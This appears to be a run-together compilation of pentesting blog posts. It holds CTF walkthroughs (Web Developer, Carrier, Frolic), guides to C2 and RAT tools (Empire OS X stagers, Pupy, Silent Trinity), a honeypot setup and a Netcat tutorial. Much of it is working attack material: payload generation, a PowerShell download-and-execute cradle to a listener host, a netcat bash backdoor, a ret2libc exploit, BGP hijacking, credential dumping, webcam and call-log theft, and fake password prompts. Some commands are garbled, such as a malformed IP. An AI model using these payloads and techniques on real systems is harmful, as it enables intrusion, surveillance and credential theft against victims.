Hacking Articles|Raj Chandel's Blog

Hello friends! Today we are going to take another boot2root challenge known as “Web Developer: 1”. The credit for making this VM machine goes to “Fred Wemeijer” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

· IP Discovery using netdiscover

· Network scanning (Nmap)

· Surfing HTTP service port

· Enumerating directories using Dirb

· Finding “cap” file

· Analyzing the “cap” file and finding wordpress password

· Installing vulnerable plugin in wordpress

· Exploiting the vulnerable to get reverse shell

· Finding SSH login and password

· Finding application is sudoers list

· Getting flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.19.131

Our next step is to scan our target with nmap.

nmap -p- -sV 192.168.19.131

From the NMAP Version Scan we enumerated the following details:

22 Port having the SSH service and 80 Port having HTTP service.

As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.

As we couldn’t find any links on this page. So, we will do a directory bruteforcing using dirb scan. From the scanning result, we choose the highlighted directory for further enumeration.

So, we opened this directory in the browser and found a cap file.

We will open cap file in Wireshark, and you can see that we found the username and password through it.

And using the above username and password, you can directly log on to the website. As you can see that the website is in WordPress. And I remember that there is plug-in of WordPress that is vulnerable. So, in plugin I added a new plugin i.e. ReFlex Gallery as you can in the image below:

Now, we will use the in-build exploit from Metasploit to exploit this plug in and get a session. And for this, we use the following set of commands:

use exploit/unix/wepapp/wp_reflexgallery_file_upload

set rhosts 19.2681.19.131

exploit

Once we got the session, I navigated through it a lot and found the wp-config.php, now,when reading the config file, we find username and password.

Now we find credentials inside the file, we use this credential to login through SSH. After logging in we check the sudoers list and find we can run “tcpdump” as root user.

ssh webdeveloper@192.168.19.131

sudo -l

So, we can execute a file using tcpdump, so we use the following command to execute “ls -al /root” command. Now the command will be executed only when tcpdump captures a packet.

COMMAND='ls -al /root'

TF=$(mktemp)

echo "$COMMAND"> $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

After starting tcpdump, in a new terminal we connect to target machine through SSH. Now we send a TCP packet to the 127.0.0.1 using netcat. We had to use this locally as we started tcpdump on loopback interface.

nc -v -z -n -w 1 127.0.0.1 1

As soon as we send the packet, our command is executed and we can see all the files inside “/root” directory. Inside “/root” directory, we find a file called “flag.txt”. We are again going to use tcpdump command to open “flag.txt” and are able to get the final flag.

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "$COMMAND"> $TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

In this article, we will learn multiple ways to how to hack OS X using empire. There are various stagers given in empire for the same and we use a few of them in our article. Method to attack OS X is similar to that of windows. For the beginner’s guide to pen-test OS X click here.

Table of content :

· osx/macho

· osx/applescript

· osx/launcher

· osx/jar

· osx/safari_launcher

osx/macho

The first stager we will use to attack is osx/macho. This stager will create a Mach-O file, which is an executable format of binaries in OS X. This file format is made for OS X specifically. This file format informs the system about the order in which code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.

The listener creation is the same as windows, use the http listener. Once the listener is created, execute the following set of commands:

usestager osx/macho

set Listener http

set OutFile shell.macho

execute

As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :

Osx/applescript

The next stager we will use is osx/applescript. This stager will create a code in an apple script, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stager for pen-testing Mac. To create the malicious said apple script run the following set of commands :

usestager osx/applescript

set Listener http

execute

Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :

As soon as the code is executed in the victim’s PC, you will have your session as shown in the image

Osx/launcher

The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :

usestager osx/launcher

execute

copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :

Osx/jar

The nest stager which we will use is osx/jar. This stager creates a jar file which is a java archive file. This file format is used for compressed java files which when extracted as run as desired. This file extension is specifically made for Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :

usestager osx/jar

set Listener http

set OutFile out.jar

execute

The stager will create a jar file as told above, as the said file will be executed in the victim’s system, you will have your session as shown in the image :

Osx/safari_launcher

The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:

usestager osx/safari_launcher

set Listener http

execute

Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :

So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.

In this article, we will learn to exploit windows, linux and android with pupy command and control tool.

Table of Content :

Introduction
Installation
Windows exploitation
Windows post exploitation
Linux exploitation
Linux post exploitation
Android exploitation
Android post exploitaion

Introduction

Pupy is a cross-platform, post exploitation tool as well as a multi-function RAT. It’s written in python which makes it very convenient. It also has low detectability that’s why it’s a great tool for the red team. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

It uses a reflected DLL to load python interpreter from memory which is great as nothing will be shown in the disk. It doesn’t have any special dependencies. It can also migrate into other processes. The communication protocols of pupy are modular and stackable. It can execute non-interactive commands on multiple hosts at once. All the interactive shells can be accessed remotely.

Installation

To install pupy execute the following commands one by one :

git clone https://github.com/n1nj4sec/pupy

./install.sh

Now download all the requirements using pip like the following command :

cd pupy

pip install -r requirements.txt

Now run pupy using the following command :

./pupysh.py

This command will open the prompt where you will get your session.

Now, to create our payload we will use the pupygen. Use the following help command to see all the attributes which we can use :

./pupygen.py -h

Windows exploitation

Now we will create a windows payload in order to exploit windows with the following command :

./pupygen.py -O windows -Ax86 -o /root/Desktop/shell.exe

Here,

-O : refers to the operating system

-A : refers to the architecture

-o : refers to the output file path

When you are successful in executing the shell.exe in the victims’ PC, you will have your session as shown in the image :

Windows post-exploitation

Further, there are number of post-exploits you can use, they are pretty simple to use. Some of them we have shown in our article. For message dialogue box to pop up on the target machine you can use the following command :

msgbox –title hack “you have been hacked”

As per the command, following dialogue box will open on the target machine :

You can also access the desktop using the remote desktop module with the following command :

rdesktop -r 0

After executing the above command you can remotely access the desktop just as shown in the image below :

For bypassUAC, we have the simplest command in pupy i.e. the following :

bypassuac -r

The above command will recreate a session with admin privileges as shown in the image below :

Then for getting the system’s credentials, you can use the following command :

creddump

And as you can see in the image below, you get the information about all the credentials :

Using pupy, we can also migrate our session to a particular process. With migrate command, the attributes of the command are shown in the image below :

With ps command, you can find out the process ID number of all the processes running on the target PC, along with letting you know which process is running. Knowing the process ID is important as it will be required in the migrate command and will help us to migrate our session as we desire.

Now, as we know the processes that are running, we can use it to migrate our session. For this, type the following command :

migrate -p explorer.exe -k

And then a new session will be created as desired.

Linux exploitation

To exploit Linux, we will have to generate linux payload with the following command :

./pupygen.py -O linux -A x64 -o /root/Desktop.shell

Once you execute the malicious file in the target system, you will have your session as shown in the image below :

As you have a session now, you can check if the target machine is running on a VM or is it a host machine with the following command :

check_vm

And as you can see in the image below that the target machine is, in fact, running on VM

Linux post exploitation

In post-exploitation, you can have detailed information about the target system with the following command :

privesc_checker --linenum

With pupy, you can also find out all the exploits that are working on the target system with the help of the following command :

exploit_suggester –shell /bin/bash

As you can see that in the image below, it has given us the list of all the exploits to which the target system is vulnerable.

To get the basic information about the target system such as IP address, MAC address, etc. you can use the following command :

get_info

Android exploitation

Now we will create a android payload in order to exploit windows with the following command :

./pupygen.py -O android -o /root/shell.apk

When you are successful in installing the shell.apk in the victims’ Android Phone, you will have your session as shown in the image :

Android post-exploitation

In post-exploitation, you can grab the call logs stored on the target device with the following command :

call -a -output-folder /root/call

Here,

-a : refers to getting all the call details

-output-folder : refers to the path of the output file containing the call logs

We will use the cat command on callDetails.txt to read the call logs.

To get the camera snap from the primary camera on target device, you can use the following command :

webcamsnap -v

Here,

-v : refers to view the image directly

As we can see in the given image that we have the snap captured and stored at the given location.

To get the information about the installed packages or apps on target device, you can use the following command :

apps -a -d

Here,

-a : refers to getting all the installed packages details

-d : refers to view detailed information

As we can see in the given image that we have the detailed information about the packages or apps installed on the target machine.

Today we are going to solve another CTF challenge “Carrier”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Carrier is 10.10.10.105

Penetrating Methodology

Network scanning (Nmap)
Enumerating SNMP service port (161)
Surfing HTTPS service port (80)
Logging in through Web portal
Finding command injection in web application
Getting reverse shell
Finding first flag.
Finding Border Gateway Protocol
Border Gateway Protocol (BGP) Hijacking
Capturing FTP credentials
Logging in through SSH
Finding final flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sC -sV -p- -T4 10.10.10.105

nmap -sU --min-rate=5000 -T4 10.10.10.105

The Nmap scan shows us that there are 3 TCP ports are open: 21(FTP), 22(SSH), 80(HTTP) and 1 UDP port is open: 161(SNMP)

As port 161 is open we use snmpwalk to enumerate SNMP port and find a string called “SN#NET_45JDX23”.

snmpwalk -c public -v 1 10.10.10.105

As port 80 is open, we open the web services in the browser and we find a login page.

We try username “admin” and the string we find earlier as the password. But were unable to login but by using the password “NET_45JDX23”, we were able to login.

By checking the different options in the web application, in the diagnostic tab we find something interesting. When we click on the “Verfiy status” button, we find that the server might be running “ps” command.

So further enumerate the web application, we use BurpSuite to capture the request and find inside the “check” parameter a base64 encoded string. When we decode the base64 encoded string we find the string to be called “quagga”. Now if check the web application, it is showing all the process that contains the string “quagga”. So that means the web application is running “ps” with “grep quagga” command.

Now to verify our theory, we change the check parameter to “root” and then encode it to base64 and then encode it to URL encode.

When we send the new request we find that the web application is displaying all the process that contains the string “root”.

Now we check if the web application is vulnerable to command injection or not. We try to run id command on the server.

By changing the parameter to “hack;id” and then encoding it with base64 encode and URL encode we forward the request to the server.

When we check the web application, we find that we are successfully able to run “id” command that means the web application is vulnerable to command injection.

Now we replace the id command with nc reverse shell one liner.

We encode the string with base64 encode and URL encode. We setup our listener and then forward the request.

As soon as we forward the request we get a reverse shell, we spawn a TTY shell and check for files in the current directory. Inside we find a file called “user.txt”, we open the file and find the first flag.

python -c “import pty; pty.spawn(‘/bin/bash’)”

After getting root shell we enumerated the machine, we do not find anything interesting. Going back to the tickets section in the web page, we find a hint that we need to check another subnet.

We use ping command to find all the available machines on the subnet “10.120.15.0/24”.

for i in {1..255}; do ping -c 1 10.120.15.$i | grep "bytes from" | cut -d "" -f4 | cut -d ":" -f1 ; done

Now we according to the ticket we know there is ftp server running on subnet “10.120.15.0/24”. So we scan both the IP addresses and find port 21 is open on 10.120.15.10. Further enumerating the system in cronjob we find that there is a bash script inside /opt/ directory called “restore.sh”. We take a look at the content of the file and find that the machine is working with Border Gateway Protocol (BGP) with Quagga. Now we can use a technique called BGP hijacking to take over IP address. The bash script restores the BGP configuration every 10 minutes, so we remove executable permissions from the script, so that we can make changes to the configuration of BGP

crontab -l

chmod -x /opt/restore.sh

Now we connect to vty shell and check the current configuration.

vtysh

show running-config

Now switch to configure mode, and to intercept the traffic we want 10.120.15.0/25 to use our machine as gateway.

configure terminal

ip prefix-list 0xdf permit 10.120.15.0/25

route-map to-as200 permit 10

match ip address prefix-list 0xdf

set community no-export

route-map to-as200 permit 20

route-map to-as300 deny 10

match ip address prefix-list 0xdf

route-map to-as300 permit 20

router bgp 100

network 10.120.15.0 mask 255.255.255.128

end

clear ip bgp *

If we check our BGP routes we find that our machines will be used as gateway.

show ip bgp neighbors 10.78.10.2 advertised-routes

Now we will start collecting packets on port 21 using tcpdump, we will be using the interface eth2.

tcpdump -i eth2 -nnXSs 0 ‘port 21’ -w hack.pcap

We wait for some time then interrupt the capture and check if the pcap file has been created. Now we transfer the file to our system and analyze it with wireshark and find the password for FTP.

Password: BGPtelc0routing

We use this password to login through SSH on the target system and are successfully able to login. After logging in, we find a file called root.txt, we take a look at the content of the file and find the final flag.

ssh root@10.10.10.105

OSX Exploitation with Powershell Empire

This article is another post in empire series. In this article we will learn OSX Penetration testing using empire.

Table of Content

Exploiting MAC

Post Exploitation

· Phishing

· Privilege Escalation

· Sniffing

Exploiting MAC

Here I’m considering you know PowerShell Empire's basics, therefore, we will create the listener first using the following commands:

uselistener http

set Host http://192.168.1.26

execute

Executing the above commands will start up the listener as shown in the image above. Now the next step is to create a stager for OS X. And for that, type :

usestager osx/launcher

execute

As you can see in the image above, the above stager will generate a code. Execute this code in the target system i.e. OS X and after the execution, you will have you session as shown in the image below :

Post Exploitation

Phishing

As we have the session of our mac, there are few post exploits that can use to our advantage. The first post exploitation module we will use is collection/osx/prompt. Using this module will ask the user to enter their password to their apple ID, which means this module does not works in stealth mode. To use this module type :

usemodule collection/osx/prompt

execute

Executing the above module will open a prompt in the target machine as shown in the image below and when entered password you have it in clear text as shown in the image above.

Privilege Escalation

For the privilege escalation of OS X, we have used the module privesc/multi/sudo_spawn. To sue this module type :

usemodule privesc/multi/sudo_spawn

set Listener http

set Password toor

execute

Executing this module will give you admin rights with a new session, as you can see in the image below :

Sniffing

The module we will use is collection/osx/sniffer. This will sniff around all the traffic in the coming to and going from our target system and give us all necessary details by creating a pcap file. To use module type :

usemodule collection/osx/sniffer

execute

As you can see that you will even find the password in clear text in the pacap file as shown in the image below :

Next post module is of taking a screenshot of the target system and to use the said module type :

usemodule collection/osx/screenshot

execute

The above module will take a screenshot as shown in the image below :

There are further number of post modules which you can use and experiment with as shown in the image below :

In this article we will learn to use Silent Trinity tool to exploit windows.

Table of content:

· Introduction

· Installation

· Windows exploitation

· Windows post exploitation

· Silent trinity to meterpreter

Introduction

Silent trinity is a command and control tool dedicated to windows. It is developed by byt3bl33d3r in python, iron python, C# and .net. as it is windows dedicated tool, C# was but obvious choice as it has direct access .NET framework just like PowerShell. Its an amazing post exploitation tool for windows. This tool supports C2 server over HTTP 1.1.

Installation

Installing silent trinity is pretty easy as you just have to download it using git clone and then install its dependencies using pip command. To download silent trinity, use the following command :

git clone https://github.com/byt3bl33d3r/SILENTTRINITY

Now to install all the requirements using the following commands :

pip install -r requirements.txt

Once the installation is complete, start the said tool as shown in the image below :

Windows exploitation

As the tool is up and running, use ‘list’ command to see the list of listeners available. As you can see in the image below only listeners are available i.e. http, and https. To start the listener, use the following set of commands :

use http

start

When starting the listener, there is np need to give IP address or port as it automatically takes the IP of the local machine and the port is always pre-defined, depending on the listener, such as port 80 is specified for the listener http and port 443 is specified for the listener https. Now, as you can see that in the image below , with the help of the above commands our listener has started :

As we done with the listeners, now comes the stagers. Similar to listener, use the ‘list’command to see the list of all the available listeners. Because this tool is a windows dedicated tool, there are only three stagers in relation to windows and they are msbuild, wmic, powershell. To launch the stager use the following set of commands :

use msbuild

generate http

Executing the above commands will create a file. Share that file to the target system using python server as shown in the image below :

And now, run the file in the command prompt of the target system with the following command :

C:\windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuiild.xml

As the file is executed, you can see in the image below, a session will be generated.

Windows Post Exploitation

As the session is generated, you can again use the ‘list’ command to see the list of post exploitation modules available, some of which we will show in our article, as shown in the image below :

Let’s try and use the message box. The purpose of this exploit is to pop a message on the victim’s PC. To use this exploit run the following set of commands :

use ipy/msgbox

set Text “Hacking Articles”

set Title “Hack”

run

And as the result of the said exploit, a message box will pop up on the target machine. You can see the message box in the image below :

The next exploit is to receive the basic information about the target system. And fot his, type the following set of commands :

use ipy/systeminfo

run

There is an module for enumeration of host and to run that module type the following set of commands :

use ipy/hostenum

run

As you can see you have catalogues and detailed information about your target system in the image below :

With the next exploit, you can access shell of the target system but command by command and for this type :

use ipy/shell

set Command ipconfig

run

As shown in the image below, it runs the ipconfig command through the session that have access to.

Silent trinity to meterpreter

To have a meterpreter session via silent trinity start Metasploit by using msfconsole command in a new terminal. And use the web_delivery exploit using the following command :

use exploit/multi/script/web_delivery

set payload windows/x64/meterpreter/reverse_tcp

set lhost eth0

set lport 4444

run

Running the above commands will generate a command that is to be run in the target system as shown in the image below :

The above generated command is to be run in the shell of the victim’s PC and for that execute the command in the shell by using silent trinity as we had run ipconfig command earlier. For this, type :

set Command “powershell.exe -nop -w hidden -c $W=new-object net.webclient;$W.proxy=[Net.WebRequest]::GetSystemWebProxy();$W.Proxy.CredentialCache]::DefaultCRedentialls;IEX $W.downloadstring(‘http://192.168.19.128:8080/lhMCcYixubz’);

eun

As the command will run in silent trinity, you will have your meterpreter session as shown in the image below :

So, all in all, Silent trinity is an amazing tool when it comes to exploiting windows.

This is our 8^th post in the series of empire which covers how to use empire as GUI. Empire has a great GUI mechanism, but it's still developing as it has been released just a while back. For empire GUI to work, we need to download all of its dependencies and this is where it gets a bit complicated. So, first of all, we will download the beta 3.0 version of empire as it’s the only version compatible with the GUI. Using the following commands:

git init

git remote add -t “3.0-beta” -f origin “https://github.com/EmpireProject/Empire”

Now run the following command as instructed on the GitHub page :

git checkout 3.0-Beta

Now to install the beta version, type the following command :

./setup/install.sh

Now to run empire use the following as it will link the command line to GUI version :

./empire –server –shared_password 12345 –port 1337

And as shown in the image below, the Empire will start.

Now, download the GUI of empire from GitHub using the following command :

git clone https://github.com/EmpireProject/EmpireGUI.git

Now that GUI of empire and the beta version of empire has been downloaded, we need to install its dependencies for it to work successfully. And for that, we will have to download nodejs first and to download it, type :

apt install nodejs

And in time, it will be installed as shown in the image below :

After nodejs, we have to download npm and for that type :

apt install npm

As its download, like in the image above, now run the following command in order to install it :

nmp install

And then start the npmservice, as shown in the image below, with the following command :

npm start

After all this, the GUI od empire will start as shown in the image below :

Moving further once the GUI of empire is up and running, create a stager and get an agent from the beta version of empire, while getting a session, remember to use port 1337 as that is the port the GUI works on.

Now, on the GUI, log in using your IP and port and other details as shown in the image below :

And as you will login, it will show you all the sessions you have, just like in the image below :

Here, all the shell commands will work as shown in the image above. As the GUI is still developing, we can’t use it for post exploitations. But it, it comes pretty handy in order to manage multiple sessions and it helps you understand its working better.

Today we are going to solve another CTF challenge “Frolic”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Frolic is 10.10.10.111

Penetrating Methodology

· Network scanning (Nmap)

· Surfing HTTPS service port (9999)

· Enumerating directory using dirb

· Enumerating web application

· Finding Playsms management system

· Exploiting playsms and getting reverse shell

· Getting user flag

· Finding SUID bit files

· Finding vulnerability in the binary

· Exploiting binary and getting root shell

· Getting root flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sV 10.10.10.111

The Nmap scan shows us that there are 4 ports are open: 22(SSH), 139(SMB), 445(SMB), 9999(HTTP)

As port 9999 is running HTTP service, we open the IP address in the web browser.

We don’t find anything on the web page, so we further enumerate the web service using dirb scan.

dirb http://10.10.10.111:9999/

Dirb scan gave us a few interesting looking links, we open a link called /admin/ and find a login page.

We take a look at the source code and find a link called “login.js”.

We open the “login.js” and find username and password hardcoded in the JavaScript.

We use the username and password we found earlier to login. After logging in we find “ook” encoded string.

We decode the string and a link inside.

We open the link and find a page with base64 encoded string.

We copy the base64 encoded string and save it in our system and then convert it and save it in a file. We check the file type and find it is a zip file. We try to extract it and find it is password protected. We use fcrackzip to bruteforce the zip file and find the password to be “password”. We extract the files from the zip file and find a file called index.php. We take a look at the content of the file and find hex encoded string.

base64 -d code > encodedfile

file encodedfile

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u encodedfile

unzip encodedfile

We decoded the string using burpsuite and find a base64 encoded string. We decode the base64 encoded string and find a brainfuck encoded string.

We decoded the brainfuck encoded string and find a string called “idkwhatispass”.

We open /playsms directory and find playsms CMS login page.

We try username “admin” and password “idkwhatispass” to login and are successfully able to login. So we use metasploit to get a reverse shell using these credentials.

msf > use exploit/multi/http/playsms_uploadcsv_exec

msf exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111

msf exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999

msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms

msf exploit(multi/http/playsms_uploadcsv_exec) > set username admin

msf exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass

msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost tun0

msf exploit(multi/http/playsms_uploadcsv_exec) > exploit

After getting a reverse shell, we spawn a TTY shell and start enumerating the system. Inside /home/aysush directory we find a file called “user.txt”. We open the file and find the first flag. Then we start looking for files with SUID bit set and find a file called “rop” inside “/home/ayush/.binary” directory.

python -c “import pty; pty.spawn(‘/bin/bash’)”

find / -perm -u=s -type f 2>/dev/null

The target machine doesn’t have “gdb”, so we download the “rop” file in our system and start looking for vulnerabilities. We create a 150 bytes long pattern with pattern_create.rb file in our system and then open the file with “gdb” and supply the pattern as an argument to our file. As soon as we run the application we get a segmentation fault. Now as we can overwrite instruction pointer that means the application is vulnerable to buffer overflow.

gdb -q rop

We copy the value of EIP and use “pattern_offset.rb” script to find the EIP offset.

./pattern_offset -q 0x62413762

As it is difficult for us to make a jump to stack, because we cannot get the address of the stack we want to jump. So we use ret2libc to exploit the vulnerability and get a shell. Now in our system we first find the address of “system” function and a return address. Now we find the address of “/bin/sh” to execute using “system” function.

p system

p exit

find 0xf7e0c980, +9999999, “/bin/sh”

We write an exploit and check if we can exploit the application to spawn a shell.

We run the exploit in our system and are successfully able to spawn a shell.

r $(python exploit.py)

Now we cannot directly run this exploit on the target system, as we don’t have the addresses of the libc functions of the target system. We are going to change the addresses of the exploit according to the target machine. First get the address of libc used by the binary. As we don’t have gdb in the target system, so we use readelf, strings and grep to find “system”, “exit” and “/bin/sh” for our exploit.

ldd /home/ayush/.binary/rop |grep libc

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit

strings -tx /lib/i386-linux-gnu/libc.so.6 | grep “/bin/sh”

We have to add the value of “system”, “exit” and “/bin/sh” to the address of libc to get the address of “system”, “exit” and “/bin/sh” .Now we make the following changes to the exploit. You can download the exploit from here.

We transfer the exploit to the target machine and run the exploit. As soon as we run the exploit we are able to spawn a shell as root user.

/home/ayush/.binary/rop $(python /tmp/exploit.py)

After getting a reverse shell, we switch to /root directory and get a file called “root.txt”. We take a look at the content of the file and get the final flag.

In this article, however, we will set up a framework to draw in attacker so we can catch or study them. Since almost the majority of the attackers around the globe are focusing on Windows servers for the various of their known defects and vulnerabilities, we will set up a Windows framework to do only that. we will set up a honeypot. In the event that you abandon it ready for action, you can watch other attackers rehearsing their attack and prepare for it.

Table of content:

· Introduction to Honeypot

· Introduction to KFSensor

· Working of KFSensor

Introduction to Honeypot

Honeypot disguises itself as an actual server to give the false idea to the attackers and divert their attacks. Therefore, honeypot should be set up just like the real server so that data can appear to be authentic by showing fake files, fake ports, fake directories, etc. As the honeypot creates the illusion of being legitimate; the attacker tends to believe that they have gained accessed of the real deal. One of the main differences is the area of the machine in connection to the genuine servers. The disguised machine is normally set someplace in the DMZ. This guarantees the inner system isn't presented to the attacker. Honeypots work by checking and\or once in a while controlling the interloper amid their utilization of the Honeypot. This should be possible whether the assault originated all things considered or within the system, contingent upon the area of the distraction framework. Honeypots are commonly intended to review the action of an interloper, spare log documents, and record such occasions as the procedures began, orders, a record includes, erases, changes, and even keystrokes.

Introduction to KFSensor

KFSensor is a honeypot for a windows system. it also acts as an IDS. Its job is to attract and detect all the attackers in the network, hence the name 'Honeypot'. It does so by imitating a vulnerable environment and disguising itself as a server and it way, it succeeds to not only catch the attacker but also helps to know their motive. It is specifically designed for windows therefore it contains a lot of windows dedicated unique features. It’s quite convenient to use and a user friendly due its GUI based console, along with its low maintains.

Working of KFSensor

KFSensor's role is to be a decoy server for the attackers in order to protect the real thing. It does its job perfectly by opening fake ports on the system where it's installed and gathering the information when a connection is made. It does this in precisely the same way as routine server program, such as a web server or an SMTP server. By doing this it sets up a target, or a honeypot server, that will record the activities of an attacker.

Working with KFSensor

After downloading and installing KFSensor, when you turn it on, you will see the following window. Here, click on next.

Then it will ask you to select the ports as shown in the image below, after selecting the ports click on next button.

Then it will ask you if you want get email notification of its alerts over the time. So, here, you can add the email from which you want to send and the email where you want to receive the mails.

After these formalities, click on finish button.

Once, you click on the finish button, it will show you the following window.

Now, as the honeypot has been setup, if you scan the victim target (which is installed with honeypot) using nmap, it will show you all the ports open ass a decoy, just like its shown in the image below :

And in KFSensor it will show the details of the scan along with its IP. It will also generate an alarm to alert you.

If the attacker is using any other tool to scan the network, like Nessus, even then the working of KFSensor will be same. For instance, if the attack is through Nessus as shown in the image below :

And when the attack from Nessus is completed, it will show you the faux result as you can see in the image below :

And similarly, the KFSensor will alert you as it is shown in the image below :

This way, KFSenor is the best way to detect and confuse the attacker in order to save yourself and be cautious.

This article will provide you with the basic guide of Netcat and how to get a session from it using different methods.

Table of Contents:

· Introduction

· Features

· Getting start with NC

· Connecting to a Server

· Fetching HTTP header

· Chatting

· Creating a Backdoor

· Verbose Mode

· Save Output to Disk

· Port Scanning

· TCP Delay Scan

· UDP Scan

· Reverse TCP Shell Exploitation

· Randomize Port

· File Transfer

· Reverse Netcat Shell Exploitation

· Banner grabbing

Introduction to Netcat

Netcat or nc is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In case of attacking, it can be driven by scripts which makes it quite dependable back-end. and if we talk about security, it helps us to debug the network along with investing it.

Features

· Act as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Netcat. This lets you you control every character sent and view the raw, unfiltered responses.

· Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Netcat can connect to destinations through a chain of anonymous or authenticated proxies.

· Run on all major operating systems. We distribute Linux, Windows, and Mac OS X binaries, and Netcat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you're using.

· Encrypt communication with SSL, and transport it over IPv4 or IPv6.

· Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.

· Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Netcat chat mode.

Getting start with NC

To start NC, the most basic option we can use the help command. This will show us all the options that we can use with Netcat. The help command is the following one :

nc -h

Connecting to a Server

Here, we have connected FTP Server with the IP Address 192.168.1.6. To connect to the server at specific port where a particular service running. In our case the port is 21 i.e. FTP.

Syntax: nc [Target IP Address] [Target Port]

nc 192.168.1.6 21

As we can see in the given image, we have vsFTPd installed on the server, and after giving the Login credentials we have successfully logged in the FTP Server.

Fetching HTTP header

We can use netcat to fetch the information about any webserver. Let’s get back to the server we connected to earlier. It also has HTTP service running on port 80. So, we connected to HTTP service using netcat as we did earlier. Now after connecting to the server we use the option that will give us the header along with the source code of the HTTP service running on the remote server.

nc 192.168.1.6 80

HEAD/HTTP/1.0

As we can see in the given image that the header and source code is displayed through the netcat connection.

Chatting

Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation and so once the connection is established, communication can be done from both ends. Here we are going to create a scenario of chatting between two users with different operating system.

User 1

OS: Windows 10

IP Address: 192.168.1.4

Role: Listener

User 2

OS: Kali Linux

IP Address: 192.168.1.35

Role: Initiator

Now in each and every scenario, regarding netcat. This step is prominent. First we will have to create a listener. We will use following command to create a listener:

nc -lvvp 4444

where,

[-l]: Listen Mode

[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}

[p]: Local Port

Now, it’s time to create an initiator, for this we will just provide the IP Address of the System where we started the Listener followed by the port number.

NOTE: Use the same port to create an initiator which was used in creating listener

nc 192.168.1.4 4444

Creating a Backdoor

We can also create a backdoor using NC. To create a backdoor on the target system that we can come back to at any time. Command for attacking a Linux System.

nc -l -p 2222 -e /bin/bash

This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system.

nc 192.168.1.35 2222

Verbose Mode

In netcat, Verbose is a mode which can be initiated using [-v] parameter. Now verbose mode generates extended information. Basically, we will connect to a server using netcat two times to see the difference between normal and verbose mode. In the image give below, we can see that when we add [-v] to the netcat command it displays the information about the process that its performance while connecting to the server.

nc 192.168.1.6 21 -v

Save Output to Disk

For the purpose of the record maintenance, better readability and future references, we will save the output of the Netcat. To do this we will use the parameter -o of the Netcat to save the output in the text file.

nc 192.168.1.6 21 -v -o /root/output.txt

Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file or not. In this case, our location for output is /root /output.txt.

Port Scanning

Netcat can be used as a port scanner although it was not designed to function as one. To work as a port scanner, we use the [-z] parameter. It tells netcat to scan listing daemon without sending any data. This makes it possible for netcat to understand the type of service that is running on that specific port. Netcat can perform TCP and UDP scan.

TCP Scan

nc -v -n -z -w 2 192.168.1.6 21-1100

Here,

· [-v]: indicates Verbose mode

· [-n]: indicates numeric-only IP addresses

· [-z]: indicates zero -I/O mode [used for scanning]

· [-w]: indicates timeout for connects and final net reads

Also, to perform a port scan netcat needs a range of port numbers. We can provide a range of ports to scan.

From the given image we can see that the target machine has lots of ports open with various services running on them.

nc -v -n -z -w 2 192.168.1.6 21-1100

TCP Delay Scan

In order to not to be noisy in an environment, it is recommended to use a delayed scan. Now to perform a delay scan, we need to specify the delay. We will use the [-i] parameter to specify the delay in sending next packet in seconds.

nc -z -v -i 10 192.168.1.6 21-80

UDP Scan

Netcat can scan the UDP ports in a similar way it scanned the TCP ports. We are going to use [-u] parameter to invoke the UDP mode.

nc -vzu 192.168.1.6 80-90

